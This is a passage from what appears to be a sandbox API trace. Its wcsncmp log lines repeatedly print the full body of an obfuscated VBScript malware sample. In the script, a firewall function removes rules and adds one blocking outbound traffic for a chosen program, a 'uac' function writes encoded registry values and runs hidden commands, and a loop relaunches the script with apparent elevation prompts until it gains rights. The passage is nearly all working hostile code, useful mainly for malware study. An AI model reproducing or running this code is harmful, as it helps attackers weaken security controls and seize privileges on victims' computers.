bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.320] wcsncmp (_String1="egra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.320] wcsncmp (_String1="gra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90 [0226.320] wcsncmp (_String1="ra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.320] wcsncmp (_String1="a(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.320] wcsncmp (_String1="(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 